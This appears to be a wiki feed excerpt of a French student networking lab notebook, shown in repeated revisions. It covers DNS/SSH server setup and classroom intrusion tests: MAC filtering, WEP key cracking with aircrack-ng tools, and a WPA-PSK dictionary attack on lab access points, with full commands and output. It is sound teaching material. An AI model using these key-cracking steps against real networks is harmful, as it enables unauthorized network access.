@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34963</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34963"/>
				<updated>2016-11-07T10:42:08Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
